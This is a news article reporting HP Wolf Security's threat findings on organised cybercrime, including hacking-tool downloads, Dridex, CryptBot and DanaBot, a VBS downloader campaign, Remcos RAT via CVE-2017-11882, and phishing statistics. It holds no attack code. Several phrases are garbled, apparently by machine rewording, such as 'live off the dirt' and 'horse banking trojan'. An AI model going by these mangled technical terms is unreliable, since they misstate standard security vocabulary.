Hacking Tool Downloads Rise As Cybercrime Becomes “More Organized Than Ever”

There has been a significant increase in the frequency and sophistication of cybercrime activity, including a 65% increase in the use of hacking tools downloaded from underground forums and sharing websites. files from H2 2020 to H1 2021, according to HP’s latest Global Threat Insights report. .

The researchers noted that the widely distributed hacking tools were surprisingly capable. For example, a tool can solve CAPTCHA problems by using computer vision techniques, namely optical character recognition (OCR), to perform credential stuffing attacks against websites.

More generally, the report found that cybercrime is more organized than ever, with underground forums providing an ideal platform for threat actors to collaborate and share attack tactics, techniques and procedures.

“The proliferation of hacked hacking tools and underground forums allows previously low-level actors to pose serious business security risks,” says Dr Ian Pratt, Global Head of Security, Personal Systems, HP Inc.

“At the same time, users continue to fall prey to simple phishing attacks time and time again. Security solutions that keep IT departments ahead of future threats are critical to maximizing business protection and resiliency, ”he said.

Notable threats isolated by HP Wolf Security include:

  • Cybercrime collaboration opens the door to larger attacks against victims: Dridex affiliates sell access to violated organizations to other threat actors, so they can distribute ransomware. The decline in Emotet’s business in the first quarter of 2021 made Dridex the first malware family isolated by HP Wolf Security.
  • Information thieves delivering more malicious malware: CryptBot malware, historically used as an information thief to steal credentials from cryptocurrency wallets and web browsers, is also used to deliver DanaBot, a horse banking trojan operated by organized crime groups.
  • VBS Download Campaign Targeting Business Executives: A multi-step Visual Basic Script (VBS) campaign shares malicious ZIP attachments named after the executive it targets. It deploys a stealthy VBS downloader before using legitimate SysAdmin tools to live off the dirt, persistent across devices, and spreading malware.
  • From app to infiltration: A malicious digest-themed spam campaign targeted transportation, shipping, logistics and related companies in seven countries (Chile, Japan, UK, Pakistan, US, Italy and Philippines), exploiting a vulnerability in Microsoft Office to deploy the available Remcos RAT and gain backdoor access to infected computers.

The results are based on data from HP Wolf Security, which tracks malware within isolated micro-virtual machines to understand and capture a full chain of infection and help mitigate threats. By better understanding the behavior of malware in the wild, HP Wolf Security researchers and engineers are able to strengthen endpoint security protections and overall system resiliency.

“The cybercrime ecosystem continues to grow and transform, with more opportunities for small cybercriminals to connect with larger organized crime players and download advanced tools capable of bypassing defenses and systems. of breach, ”said Alex Holland, senior malware analyst at HP.

“We are seeing hackers adapting their techniques to generate greater monetization, selling access to organized crime groups so that they can launch more sophisticated attacks against organizations,” he said.

“Previously, malware strains like CryptBot would have posed a danger to users who use their PCs to store cryptocurrency wallets, but now they also pose a threat to businesses.

“We are seeing infostealers distributing malware exploited by organized crime groups that tend to favor ransomware to monetize their access.”

Other key findings from the report include:

  • 75% of malware detected was sent via email, while web downloads were responsible for the remaining 25%. Threats downloaded using web browsers increased by 24%, in part due to users downloading hacking tools and cryptocurrency mining software.
  • The most common email phishing lures were invoices and business transactions (49%), while 15% were responses to intercepted threads. Phishing lures mentioning COVID-19 were less than 1%, down 77% from H2 2020 to H1 2021.
  • The most common type of malicious attachments were archive files (29%), spreadsheets (23%), documents (19%), and executable files (19%). Unusual archive file types such as JAR (Java Archive Files) are used to bypass detection and analysis tools and install malware easily obtained from underground markets.
  • The report found that 34% of captured malware was previously unknown1, a decrease of 4% from the second half of 2020.
  • A 24% increase in malware that exploits CVE-2017-11882, a memory corruption vulnerability commonly used to exploit Microsoft Office or Microsoft WordPad and conduct fileless attacks.

“Cybercriminals easily bypass detection tools by simply fine-tuning their techniques,” says Holland.

“We have seen an increase in the number of malware distributed through uncommon file types, such as JAR files, which are probably used to reduce the chances of being detected by anti-malware scanners,” he explains. .

“The same old phishing tricks are trickling down to victims, with transaction-themed lures that convince users to click on malicious email attachments, links and web pages. “

Pratt concludes, “As cybercrime takes hold and small players can easily obtain effective tools and monetize attacks by selling on access, there is no minor breach.

“The endpoint continues to be a priority for cybercriminals. Their techniques are becoming more sophisticated, so it’s more important than ever to have a complete and resilient endpoint infrastructure and cyber defense, ”he says.

“This means using features like threat containment to defend against modern attackers, minimizing the attack surface by eliminating threats from the most common attack vectors, emails, browsers and downloads. . “

Sam D. Gomez